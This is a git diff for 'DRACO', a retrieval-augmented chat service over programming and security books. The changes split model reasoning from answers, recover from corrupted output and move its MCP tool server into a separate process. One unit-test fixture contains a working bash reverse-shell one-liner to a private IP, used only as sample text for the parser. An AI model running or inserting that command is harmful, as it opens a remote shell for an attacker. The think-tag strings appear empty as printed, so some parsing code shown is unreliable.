diff --git a/app.py b/app.py
index 3eba415..ea260af 100644
--- a/app.py
+++ b/app.py
@@ -104,9 +104,17 @@ def chat():
def generate():
yield f"data: {json.dumps({'type': 'sources', 'sources': sources})}\n\n"
+ acc = ""
try:
- for piece in core.stream_ollama(prompt):
- yield f"data: {json.dumps({'type': 'token', 'text': piece})}\n\n"
+ for channel, piece in core.stream_ollama(prompt):
+ if channel == "answer":
+ acc += piece
+ if core.degenerate(acc):
+ core.unload_model() # auto-recovery: next request reloads clean
+ yield f"data: {json.dumps({'type': 'error', 'text': 'model hiccup — auto-recovered, ask again'})}\n\n"
+ yield f"data: {json.dumps({'type': 'done'})}\n\n"
+ return
+ yield f"data: {json.dumps({'type': 'token', 'channel': channel, 'text': piece})}\n\n"
except Exception as e:
yield f"data: {json.dumps({'type': 'error', 'text': f'Model offline: {e}'})}\n\n"
yield f"data: {json.dumps({'type': 'done'})}\n\n"
@@ -289,50 +297,23 @@ def sitemap():
return Response(body, mimetype="application/xml")
# ------------------------------------------------------------------ MCP (streamable-http)
-try:
- from mcp.server.fastmcp import FastMCP
- mcp = FastMCP("draco", host="127.0.0.1", port=CFG.get("mcp_port", 8012),
- streamable_http_path="/mcp")
-
- @mcp.tool()
- def draco_ask(question: str) -> str:
- """Ask DRACO a coding or security question. Answers are grounded in hundreds of
- real programming and hacking books, with [n] citations and source titles."""
- prompt, hits = core.build_prompt(question, k=CFG.get("rag_k", 6))
- try:
- answer = core.ask_ollama(prompt)
- except Exception as e:
- return f"Model offline: {e}"
- src = "\n".join(f"[{i+1}] {h['title']} ({h['category']})" for i, h in enumerate(hits))
- return f"{answer}\n\nSOURCES:\n{src}"
-
- @mcp.tool()
- def draco_search(query: str, k: int = 8) -> str:
- """Search DRACO's book library (BM25) for passages matching a topic."""
- hits = core.search_library(query, k=k)
- if not hits:
- return "No passages matched."
- return "\n\n".join(f"[{h['title']} · {h['category']} · score {h['score']}]\n{h['text'][:600]}" for h in hits)
-
- @mcp.tool()
- def draco_status() -> str:
- """DRACO health + library size."""
- s = core.get_stats()
- return (f"DRACO {CFG['model']} · {s['books']} books · {s['chunks']} passages · "
- f"API: {CFG['base_url']}/api · MCP: {CFG['base_url']}/mcp")
-
- from starlette.applications import Starlette
- starlette_app = mcp.streamable_http_app()
- app.mount("/mcp", starlette_app)
- MCP_OK = True
-except Exception as _e: # MCP optional at runtime
- MCP_OK = False
- MCP_ERR = str(_e)
-
+# MCP lives in its own ASGI process (mcp_server.py, uvicorn :8013); nginx routes /mcp there.
+# Status reflects the MCP service health.
@app.route("/mcp-info")
def mcp_info():
- return jsonify(mcp=MCP_OK, error=MCP_ERR if not MCP_OK else None,
- url=f"{CFG['base_url']}/mcp")
+ mcp_ok = False
+ try:
+ r = http.post("http://127.0.0.1:8013/mcp", timeout=6,
+ headers={"Content-Type": "application/json",
+ "Accept": "application/json, text/event-stream"},
+ json={"jsonrpc": "2.0", "id": 1, "method": "initialize",
+ "params": {"protocolVersion": "2025-03-26", "capabilities": {},
+ "clientInfo": {"name": "mcp-info-probe", "version": "1"}}})
+ mcp_ok = r.status_code == 200
+ err = None if mcp_ok else f"mcp service http {r.status_code}"
+ except Exception as e:
+ err = str(e)
+ return jsonify(mcp=mcp_ok, error=err, url=f"{CFG['base_url']}/mcp")
# ------------------------------------------------------------------ static
@app.route("/static/logo.svg")
@@ -347,5 +328,4 @@ def logo():
# ------------------------------------------------------------------ main
if __name__ == "__main__":
- print(f"DRACO starting · MCP={'ok' if MCP_OK else 'FAILED: ' + MCP_ERR}")
app.run(host="127.0.0.1", port=CFG["port"], threaded=True)
diff --git a/deploy/draco-mcp.service b/deploy/draco-mcp.service
new file mode 100644
index 0000000..da16d42
--- /dev/null
+++ b/deploy/draco-mcp.service
@@ -0,0 +1,15 @@
+[Unit]
+Description=DRACO MCP server (streamable-http)
+After=network.target
+
+[Service]
+Type=simple
+WorkingDirectory=/opt/draco
+ExecStart=/opt/draco/venv/bin/python3 -m uvicorn mcp_server:app --host 127.0.0.1 --port 8013 --log-level warning
+Restart=always
+RestartSec=5
+Environment=PYTHONUNBUFFERED=1
+Environment=DRACO_MCP_PORT=8013
+
+[Install]
+WantedBy=multi-user.target
diff --git a/deploy/nginx-draco.conf b/deploy/nginx-draco.conf
index 1b63c9c..aff1049 100644
--- a/deploy/nginx-draco.conf
+++ b/deploy/nginx-draco.conf
@@ -5,6 +5,14 @@ server {
access_log /var/log/nginx/draco.access.log;
error_log /var/log/nginx/draco.error.log;
+ location = /mcp {
+ proxy_pass http://127.0.0.1:8013;
+ proxy_set_header Host localhost:8013; # MCP SDK guard requires allowed host[:port]
+ proxy_buffering off; # SSE
+ proxy_cache off;
+ proxy_read_timeout 300s;
+ }
+
location / {
proxy_pass http://127.0.0.1:8012;
proxy_set_header Host $host;
diff --git a/draco_core.py b/draco_core.py
index 62e8e6c..b5a3fbd 100644
--- a/draco_core.py
+++ b/draco_core.py
@@ -142,81 +142,217 @@ def build_prompt(question, k=6):
# ---------------------------------------------------------------- ollama
import requests as http
+OPEN, CLOSE = "", ""
+
def strip_cot(text):
- text = re.sub(r"(?s).*?", "", text)
- if "" in text:
- text = text.split("")[-1]
- if "" in text: # unbalanced opener: keep what follows
- text = text.split("")[-1]
- return text.strip()
+ """Non-streaming: return (reasoning, answer). Handles tagged AND untagged CoT."""
+ if OPEN in text:
+ pre, rest = text.split(OPEN, 1)
+ if CLOSE in rest:
+ think, answer = rest.split(CLOSE, 1)
+ return (pre + think).strip(), answer.strip()
+ return "", rest.strip() # unbalanced opener
+ if CLOSE in text: # missing opener: preamble before close is reasoning
+ think, answer = text.split(CLOSE, 1)
+ return think.strip(), answer.strip()
+ return "", text.strip() # no tags: answer as-is
-def ask_ollama(prompt):
- r = http.post(f"{CFG['ollama_url']}/api/generate",
- json={"model": CFG["model"], "prompt": prompt, "stream": False,
- "options": {"temperature": 0.4, "num_predict": 700,
- "num_ctx": CFG.get("num_ctx", 8192)}},
- timeout=180)
- r.raise_for_status()
- return strip_cot(r.json().get("response", ""))
-
-class CoTFilter:
- """Streaming filter that drops ... blocks token-by-token."""
- OPEN, CLOSE = "", ""
+class ThinkSplitter:
+ """Streaming: yield (channel, piece) where channel is 'think' or 'answer'.
+ Handles: .., missing opener ( closes), or fully untagged
+ output — where meta-narration ("The user asks... Let me check the excerpts...")
+ is detected by a gated prefix + per-paragraph classifier and routed to 'think',
+ while real content paragraphs start the 'answer'."""
+ PRE, THINK, NARR, ANSWER = range(4)
+ import re as _re
+ _BOLD = r"\*\*[^*\n]{1,60}\*\*"
+ NARR_START = _re.compile(
+ r"^\s*(?:the user|user asks|user want|let me|i need|i'll|i will|i should|"
+ r"okay\b|ok,|alright|hmm\b|to answer|so i|so,|we need|looking at|"
+ r"first,|step 1[:.]|" + _BOLD + r")", _re.IGNORECASE)
+ NARR_CONT = _re.compile(
+ r"^\s*(?:" + _BOLD +
+ r"|the (?:user|excerpts?|passages?|books?|sources?|quotes?)|none of"
+ r"|excerpt \[|excerpt \d|passage \d|quote \d|source \d"
+ r"|there (?:is|are) no|no (?:book|passage|excerpt|relevant)"
+ r"|based on (?:the|these|my)|so,?(?: i| the| this| none)"
+ r"|i (?:should|will|would|need|can't|cannot|don't|do not|think|see|notice)"
+ r"|to answer|as (?:the|these|per)|these (?:excerpts?|passages?|books?)"
+ r"|okay\b|alright|hmm|let me|however,? (?:the|none|there)|therefore,? (?:the|i)"
+ r"|in (?:short|conclusion|summary)|overall|finally,? (?:i|the))", _re.IGNORECASE)
+ GATE_CHARS = 140
+ GATE_MAX = 400 # hard cap: decide even without a paragraph boundary
def __init__(self):
- self.buf, self.in_think = "", False
+ self.state = self.PRE
+ self.buf = "" # scanner buffer (PRE/THINK) OR paragraph buffer (NARR)
+ self.ans_buf = "" # text held by the undecided gate
+ self.gated = False # True once answer-vs-narration has been decided
+
+ def _emit(self, channel, s):
+ return [(channel, s)] if s else []
+
+ def _take(self, n=None):
+ if n is None:
+ piece, self.buf = self.buf, ""
+ else:
+ piece, self.buf = self.buf[:n], self.buf[n:]
+ return piece
+
+ def _gate_feed(self, s):
+ """PRE-state text: hold until the start-of-answer gate can judge.
+ Decides at the first paragraph boundary after GATE_CHARS (or at GATE_MAX)."""
+ if self.gated:
+ return self._emit("answer", s)
+ self.ans_buf += s
+ boundary = self.ans_buf.find("\n\n", self.GATE_CHARS)
+ if boundary == -1 and len(self.ans_buf) < self.GATE_MAX:
+ return []
+ cut = boundary + 2 if boundary != -1 else len(self.ans_buf)
+ held, self.ans_buf = self.ans_buf[:cut], self.ans_buf[cut:]
+ self.gated = True
+ tail, self.buf = self.buf, "" # tail is NEWER than ans_buf; stream order = held + rest + tail
+ if self.NARR_START.match(held):
+ self.state = self.NARR
+ out = self._emit("think", held)
+ out += self._narr_feed(self.ans_buf + tail)
+ self.ans_buf = ""
+ return out
+ self.state = self.ANSWER
+ return self._emit("answer", held + self.ans_buf + tail)
+
+ def _narr_feed(self, s):
+ """NARR state: classify complete paragraphs; first content paragraph = answer."""
+ self.buf += s
+ out = []
+ while "\n\n" in self.buf:
+ para, rest = self.buf.split("\n\n", 1)
+ if para.strip() and self.NARR_CONT.match(para):
+ out += self._emit("think", para + "\n\n")
+ self.buf = rest
+ else:
+ self.state = self.ANSWER
+ self.gated = True
+ out += self._emit("answer", self.buf)
+ self.buf = ""
+ return out
+ return out
def feed(self, s):
self.buf += s
- out = ""
+ out = []
while True:
- if self.in_think:
- i = self.buf.find(self.CLOSE)
- if i == -1:
- keep = min(len(self.buf), len(self.CLOSE) - 1)
- self.buf = self.buf[-keep:] if keep else ""
+ if self.state == self.ANSWER:
+ out += self._emit("answer", self._take())
+ return out
+ if self.state == self.NARR:
+ out += self._narr_feed(self._take())
+ if self.state == self.NARR:
return out
- self.in_think = False
- self.buf = self.buf[i + len(self.CLOSE):]
- else:
- i_open = self.buf.find(self.OPEN)
- i_close = self.buf.find(self.CLOSE)
- # close-tag with no open-tag seen: drop the CoT preamble wholesale
- if i_close != -1 and (i_open == -1 or i_close < i_open):
- self.buf = self.buf[i_close + len(self.CLOSE):]
- self.in_think = False
+ continue
+ i_open, i_close = self.buf.find(OPEN), self.buf.find(CLOSE)
+ if self.state == self.PRE:
+ if i_open != -1 and (i_close == -1 or i_open < i_close):
+ out += self._gate_feed(self._take(i_open))
+ self.gated = True # tagged CoT follows; gate no longer needed
+ self.buf = self.buf[len(OPEN):]
+ self.state = self.THINK
continue
- if i_open == -1:
- keep = min(len(self.buf), max(len(self.OPEN), len(self.CLOSE)) - 1)
- cut = len(self.buf) - keep
- out += self.buf[:cut]
- self.buf = self.buf[cut:]
- return out
- out += self.buf[:i_open]
- self.in_think = True
- self.buf = self.buf[i_open + len(self.OPEN):]
+ if i_close != -1: # missing opener — preamble is reasoning
+ held, self.ans_buf = self.ans_buf, ""
+ out += self._emit("think", held + self._take(i_close))
+ self.buf = self.buf[len(CLOSE):]
+ self.state = self.ANSWER
+ continue
+ elif self.state == self.THINK:
+ if i_close != -1:
+ held, self.ans_buf = self.ans_buf, "" # rare held PRE text merges
+ out += self._emit("think", held + self._take(i_close))
+ self.buf = self.buf[len(CLOSE):]
+ self.state = self.ANSWER
+ continue
+ # no marker found: emit all but a tag-length tail
+ keep = min(len(self.buf), max(len(OPEN), len(CLOSE)) - 1)
+ cut = len(self.buf) - keep
+ if cut > 0:
+ piece = self._take(cut)
+ if self.state == self.THINK:
+ out += self._emit("think", piece)
+ else: # PRE: route through the gate
+ out += self._gate_feed(piece)
+ return out
def flush(self):
- out, self.buf = ("" if self.in_think else self.buf), ""
+ out = []
+ if self.state == self.PRE and (self.ans_buf or self.buf):
+ rest = self.ans_buf + self.buf # stream order: held text, then tail
+ self.ans_buf = self.buf = ""
+ if self.NARR_START.match(rest):
+ self.state = self.NARR
+ out += self._narr_feed(rest) # classify paragraphs; content → answer
+ else:
+ out += self._emit("answer", rest)
+ return out
+ if self.state == self.NARR:
+ residual, self.buf = self.buf, ""
+ if residual.strip():
+ out += self._emit("think" if self.NARR_CONT.match(residual) else "answer", residual)
+ return out
+ if self.buf:
+ piece = self._take()
+ if self.state == self.THINK:
+ out += self._emit("think", piece + self.ans_buf)
+ self.ans_buf = ""
+ else:
+ out += self._gate_feed(piece)
+ if self.ans_buf: # gate decided held text still pending
+ held, self.ans_buf = self.ans_buf, ""
+ out += self._emit("think" if self.NARR_START.match(held) else "answer", held)
return out
def stream_ollama(prompt):
+ """Yield (channel, piece) tuples: channel 'think' or 'answer'."""
r = http.post(f"{CFG['ollama_url']}/api/generate",
json={"model": CFG["model"], "prompt": prompt, "stream": True,
- "options": {"temperature": 0.4, "num_predict": 700,
+ "options": {"temperature": 0.4, "num_predict": CFG.get("num_predict", 1100),
"num_ctx": CFG.get("num_ctx", 8192)}},
timeout=(5, None), stream=True)
- flt = CoTFilter()
+ sp = ThinkSplitter()
for line in r.iter_lines():
if line:
tok = json.loads(line).get("response", "")
if tok:
- piece = flt.feed(tok)
- if piece:
- yield piece
- tail = flt.flush()
- if tail:
- yield tail
+ for channel, piece in sp.feed(tok):
+ yield channel, piece
+ for channel, piece in sp.flush():
+ yield channel, piece
+
+def ask_ollama(prompt):
+ """Non-streaming RAG answer (reasoning stripped, tagged or not)."""
+ r = http.post(f"{CFG['ollama_url']}/api/generate",
+ json={"model": CFG["model"], "prompt": prompt, "stream": False,
+ "options": {"temperature": 0.4, "num_predict": CFG.get("num_predict", 1100),
+ "num_ctx": CFG.get("num_ctx", 8192)}},
+ timeout=180)
+ r.raise_for_status()
+ _, answer = strip_cot(r.json().get("response", ""))
+ if degenerate(answer):
+ unload_model()
+ raise RuntimeError("model returned degenerate output — model unloaded, retry")
+ return answer
+
+def degenerate(s):
+ """vornith VRAM/session corruption signature: run of '?' chars."""
+ s = s.strip()
+ return len(s) >= 40 and s.count("?") / len(s) > 0.4
+
+def unload_model():
+ """Drop the model from VRAM so the next request reloads clean."""
+ try:
+ http.post(f"{CFG['ollama_url']}/api/generate",
+ json={"model": CFG["model"], "keep_alive": 0}, timeout=10)
+ except Exception:
+ pass
# ---------------------------------------------------------------- auth + metering
def auth_user(req):
diff --git a/mcp_server.py b/mcp_server.py
new file mode 100644
index 0000000..8b34e56
--- /dev/null
+++ b/mcp_server.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python3
+"""DRACO MCP server — standalone streamable-http ASGI app on :8013.
+Run: uvicorn mcp_server:app --host 127.0.0.1 --port 8013 (or python3 mcp_server.py)
+nginx routes /mcp here; Flask keeps :8012.
+"""
+import os
+
+from mcp.server.fastmcp import FastMCP
+
+import draco_core as core
+from draco_core import CFG
+
+MCP_PORT = int(os.environ.get("DRACO_MCP_PORT", 8013))
+
+mcp = FastMCP("draco", host="127.0.0.1", port=MCP_PORT, streamable_http_path="/mcp")
+
+
+@mcp.tool()
+def draco_ask(question: str) -> str:
+ """Ask DRACO a coding or security question. Answers are grounded in hundreds of
+ real programming and hacking books, with [n] citations and source titles."""
+ prompt, hits = core.build_prompt(question, k=CFG.get("rag_k", 6))
+ try:
+ answer = core.ask_ollama(prompt)
+ except Exception as e:
+ return f"Model offline: {e}"
+ src = "\n".join(f"[{i+1}] {h['title']} ({h['category']})" for i, h in enumerate(hits))
+ return f"{answer}\n\nSOURCES:\n{src}"
+
+
+@mcp.tool()
+def draco_search(query: str, k: int = 8) -> str:
+ """Search DRACO's book library (BM25) for passages matching a topic."""
+ hits = core.search_library(query, k=max(1, min(k, 25)))
+ if not hits:
+ return "No passages matched."
+ return "\n\n".join(
+ f"[{h['title']} · {h['category']} · score {h['score']}]\n{h['text'][:600]}"
+ for h in hits)
+
+
+@mcp.tool()
+def draco_status() -> str:
+ """DRACO health + library size."""
+ s = core.get_stats()
+ return (f"DRACO {CFG['model']} · {s['books']} books · {s['chunks']} passages · "
+ f"API: {CFG['base_url']}/api · MCP: {CFG['base_url']}/mcp")
+
+
+app = mcp.streamable_http_app()
+
+if __name__ == "__main__":
+ import uvicorn
+ uvicorn.run(app, host="127.0.0.1", port=MCP_PORT, log_level="warning")
diff --git a/pages.py b/pages.py
index ea5f5b6..44802c1 100644
--- a/pages.py
+++ b/pages.py
@@ -33,6 +33,8 @@ padding:3px 14px;font-size:12px;letter-spacing:2px;text-transform:uppercase;marg
.msg.assistant{color:var(--txt)}
.msg .who{font-size:11px;color:var(--dim);text-transform:uppercase;letter-spacing:1px;display:block;margin-bottom:3px}
.srcs{font-size:12px;color:var(--dim);border-left:2px solid var(--gold);padding-left:10px;margin-top:8px}
+.thinking{color:var(--dim);font-style:italic;font-size:13px;border-left:2px solid var(--line);padding-left:10px;margin-bottom:8px;white-space:pre-wrap}
+.thinking .who{font-size:10px;color:var(--dim);opacity:.7}
.cursor{display:inline-block;width:8px;height:15px;background:var(--gold);animation:blink 1s steps(1) infinite;vertical-align:text-bottom}
@keyframes blink{50%{opacity:0}}
.chatrow{display:flex;gap:10px;margin-top:12px}
@@ -141,7 +143,9 @@ async function ask(text){
try{
const r=await fetch('/api/chat',{method:'POST',headers:{'Content-Type':'application/json'},
body:JSON.stringify({q:text})});
- const reader=r.body.getReader(),dec=new TextDecoder();let buf='',acc='';
+ if(!r.ok){const t=await r.text();let m='HTTP '+r.status;try{m=JSON.parse(t).error||m}catch(e){}
+ body.textContent='⚠ '+m;busy=false;go.disabled=false;return;}
+ const reader=r.body.getReader(),dec=new TextDecoder();let buf='',acc='',thinkEl=null;
while(true){const{value,done}=await reader.read();if(done)break;
buf+=dec.decode(value,{stream:true});const lines=buf.split('\\n');buf=lines.pop()||'';
for(const line of lines){if(!line.startsWith('data: '))continue;
@@ -149,6 +153,12 @@ async function ask(text){
if(ev.type==='sources'&&ev.sources.length){
srcs.style.display='block';
srcs.textContent='📚 '+ev.sources.map(s=>'['+(s.n)+'] '+s.title).join(' · ');
+ }else if(ev.type==='token'&&ev.channel==='think'){
+ if(!thinkEl){thinkEl=document.createElement('div');thinkEl.className='thinking';
+ thinkEl.innerHTML="◈ thinking ";
+ body.parentNode.insertBefore(thinkEl,body);}
+ thinkEl.querySelector('.tbody').textContent+=ev.text;
+ log.scrollTop=log.scrollHeight;
}else if(ev.type==='token'){acc+=ev.text;body.innerHTML='';
body.appendChild(document.createTextNode(acc));body.appendChild(document.createElement('span')).className='cursor';
log.scrollTop=log.scrollHeight;
diff --git a/test_splitter.py b/test_splitter.py
new file mode 100644
index 0000000..6604486
--- /dev/null
+++ b/test_splitter.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python3
+"""Local unit test for ThinkSplitter against real vornith output shapes."""
+import sys
+sys.modules.setdefault("requests", type(sys)("requests")) # stub: splitter test needs no HTTP
+sys.path.insert(0, "/Users/drjones/draco")
+from draco_core import ThinkSplitter
+
+def run(chunks):
+ sp = ThinkSplitter()
+ think, ans = "", ""
+ for c in chunks:
+ for ch, piece in sp.feed(c):
+ if ch == "think": think += piece
+ else: ans += piece
+ for ch, piece in sp.flush():
+ if ch == "think": think += piece
+ else: ans += piece
+ return think.strip(), ans.strip()
+
+def tokens(s, n=7):
+ words = s.split(" ")
+ return [" ".join(words[i:i+n]) + " " for i in range(0, len(words), n)]
+
+fail = 0
+def check(name, chunks, want_think_prefix, want_ans_prefix):
+ global fail
+ t, a = run(chunks)
+ ok = t.startswith(want_think_prefix) and a.startswith(want_ans_prefix)
+ print(("PASS" if ok else "FAIL"), name)
+ if not ok:
+ fail += 1
+ print(" think:", repr(t[:120]))
+ print(" ans :", repr(a[:120]))
+
+# 1. untagged multi-paragraph narration → answer (the real reverse-shell case)
+s1 = ("The user asks about a \"reverse shell one-liner in bash.\" Let me look at the excerpts.\n\n"
+ "The excerpts are about UNIX Power Tools, Perl Cookbook, UNIX Hints and Hacks, "
+ "Essential System Administration. None of them contain information about a \"reverse shell one-liner.\"\n\n"
+ "So I should say the excerpts don't contain the answer, and answer from general knowledge "
+ "marked (general knowledge).\n\n"
+ "A reverse shell is a shell session initiated by the target machine back to the attacker's "
+ "listener. A classic bash one-liner is: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1")
+check("untagged narration→answer", tokens(s1), "The user asks", "A reverse shell is")
+
+# 2. tagged ...
+s2 = ("Simple factual question.\n\nA stack buffer overflow occurs when a program "
+ "writes more data than a fixed-size buffer can hold.")
+check("tagged think", tokens(s2), "Simple factual", "A stack buffer overflow occurs")
+
+# 3. missing opener (bare )
+s3 = ("The user wants a one-sentence explanation of a stack buffer overflow. Let me be concise.\n"
+ "\n\nA stack buffer overflow occurs when a program writes more data than a fixed-size "
+ "buffer on the stack can hold.")
+check("missing opener", tokens(s3), "The user wants", "A stack buffer overflow occurs")
+
+# 4. direct answer, no tags, no narration
+s4 = ("A strong password hash uses a slow, salted algorithm such as bcrypt, scrypt, or argon2. "
+ "Fast hashes like MD5 and SHA-1 are unsuitable because attackers can brute-force billions "
+ "of guesses per second on modern GPUs.")
+check("direct answer", tokens(s4), "", "A strong password hash uses")
+
+# 5. narration with **bold** opener then list content
+s5 = ("**Understanding the question**\nThe user wants to know about SQL injection. Let me examine the passages.\n\n"
+ "SQL injection occurs when untrusted input is concatenated into a query. Use parameterized "
+ "statements to prevent it.")
+t, a = run(tokens(s5))
+print("PASS" if a.startswith("SQL injection occurs") else "FAIL", "bold-opener narration (answer starts at content)")
+if not a.startswith("SQL injection occurs"): fail += 1; print(" ans:", repr(a[:100]))
+
+# 6. short direct answer (gate never reaches 140 chars → flush decides)
+s6 = "Use bcrypt with a per-user salt."
+t, a = run(tokens(s6))
+print("PASS" if a.startswith("Use bcrypt") and t == "" else "FAIL", "short direct answer")
+if not (a.startswith("Use bcrypt") and t == ""): fail += 1; print(" think:", repr(t[:80]), "ans:", repr(a[:80]))
+
+print("FAILURES:", fail)
+sys.exit(1 if fail else 0)